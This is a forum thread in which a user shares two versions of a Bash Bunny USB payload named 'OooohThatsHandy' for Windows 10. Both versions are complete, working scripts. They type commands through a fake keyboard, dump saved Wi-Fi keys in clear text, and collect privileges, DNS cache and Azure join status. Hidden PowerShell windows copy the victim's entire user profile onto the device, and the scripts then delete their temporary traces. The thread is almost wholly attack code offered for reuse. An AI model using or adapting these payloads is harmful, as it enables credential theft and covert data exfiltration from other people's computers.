Jump to content

[PAYLOAD] OooohThatsHandy - Gather handy data


PeteDavis91

Recommended Posts

Just got my first payload working properly and wanted to share. Hope someone finds it handy! 

 

REM Title:         			OooohThatsHandy
REM Description:   			Extract useful info such as nmap, wifi keys, DNS Cache, User privilieges and group memberships, user folder contents and images
REM OS:			   			Designed for Win 10
REM Author:        			Twitter @PeteDavis91
REM Version:       			0.3
REM Category:      			Exfiltration
REM Attackmodes:   			HID Storage RNDIS_ETHERNET
REM Credz:		   			Hak5 Darren obviously, 0iphori3 and Cribbit 


REM LED CODES:
REM SOLID BLUE LED:			Setting Up
REM FAST BLUE LED: 			Creating Data
REM VERY FAST BLUE LED:		Exporting Data Created and Discovered
REM SOLID WHITE LED:		Cleaning up and finalizing
REM FINISH GREEN LED: 		Safe to remove your Bash Bunny - Enjoy the data 

REM This section sets up the BashBunny
LED B SOLID
Q DELAY 1000
DUCKY_LANG gb
ATTACKMODE HID STORAGE RNDIS_ETHERNET
Q DELAY 1000
GET TARGET_IP
Q DELAY 500

REM This section runs commands to create logs and data for export
LED B FAST
Q DELAY 500
mkdir /root/hostsideloot
Q DELAY 1000
nmap -sC -O -F $TARGET_IP >> /root/hostsideloot/1.txt
Q DELAY 1000
RUN WIN 'cmd /minimized /c mkdir %TEMP%\LOOK && netsh wlan show profile * key=clear > %TEMP%\LOOK\2.txt & whoami /all > %TEMP%\LOOK\3.txt'
Q DELAY 1000
RUN WIN 'cmd /minimized /c ipconfig /displaydns > %TEMP%\LOOK\4.txt' 
Q DELAY 750


REM This section exports the previously created data as well as the running user profile with images and documents 
LED B VERYFAST
Q DELAY 50
RUN WIN "powershell -W Hidden -c \$destination = ((gwmi win32_volume -f '\"label=''BashBunny'''\").Name); robocopy \$env:TEMP\\LOOK \$destination\\loot\\"
Q DELAY 1000
RUN WIN "powershell -W Hidden -c \$destination = ((gwmi win32_volume -f '\"label=''BashBunny'''\").Name); robocopy \$env:USERPROFILE \$destination\\loot\\"
Q DELAY 1000
mv /root/hostsideloot/1.txt /root/udisk/loot/

REM Cleanup and finalizing
LED W SOLID
RUN WIN 'cmd /c rmdir /s /q %TEMP%\LOOK' 
rmdir /root/hostsideloot


ATTACKMODE FINISH
LED G FINISH 

 

Link to comment
Share on other sites

REM Title:         		OooohThatsHandy
REM Description:   		Extract useful information such as nmap, wifi keys, DNS Cache, User privilieges and group memberships, user folder contents with images, Azure Join Info
REM OS:			   		Designed for Win 10
REM Author:        		Twitter @PeteDavis91
REM Version:       		0.4
REM Category:      		Exfiltration
REM Attackmodes:   		HID Storage RNDIS_ETHERNET
REM Credz:		   		Hak5 Darren obviously, 0iphori3 and Cribbit 


REM LED CODES:
REM SOLID BLUE LED:			Setting Up
REM FAST BLUE LED: 			Creating Data
REM VERY FAST BLUE LED:		Exporting Data Created and Discovered
REM SOLID WHITE LED:		Cleaning up and finalizing
REM FINISH GREEN LED: 		Safe to remove your Bash Bunny - Enjoy the data 

REM This section sets up the BashBunny
LED B SOLID
Q DELAY 1000
DUCKY_LANG gb
ATTACKMODE HID STORAGE RNDIS_ETHERNET
Q DELAY 1000
GET TARGET_IP
Q DELAY 500

REM This section runs commands to create logs and data for export
LED B FAST
Q DELAY 500
mkdir /root/hostsideloot
Q DELAY 1000
nmap -sC -O -F $TARGET_IP >> /root/hostsideloot/1.txt
Q DELAY 1000
RUN WIN 'cmd /minimized /c mkdir %TEMP%\LOOK && netsh wlan show profile * key=clear > %TEMP%\LOOK\2.txt & whoami /all > %TEMP%\LOOK\3.txt'
Q DELAY 1000
RUN WIN 'cmd /minimized /c ipconfig /displaydns > %TEMP%\LOOK\4.txt & dsregcmd /status > %TEMP%\LOOK\5.txt' 
Q DELAY 750


REM This section exports the previously created data as well as the running user profile with images and documents 
LED B VERYFAST
Q DELAY 50
RUN WIN "powershell -W Hidden -c \$destination = ((gwmi win32_volume -f '\"label=''BashBunny'''\").Name); robocopy \$env:TEMP\\LOOK \$destination\\loot\\"
Q DELAY 1000
RUN WIN "powershell -W Hidden -c \$destination = ((gwmi win32_volume -f '\"label=''BashBunny'''\").Name); robocopy \$env:USERPROFILE \$destination\\loot\\"
Q DELAY 1000
mv /root/hostsideloot/1.txt /root/udisk/loot/

REM Cleanup and finalizing
LED W SOLID
RUN WIN 'cmd /c rmdir /s /q %TEMP%\LOOK' 
rmdir /root/hostsideloot


ATTACKMODE FINISH
LED G FINISH 

 

Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

  • Recently Browsing   0 members

    • No registered users viewing this page.
×
×
  • Create New...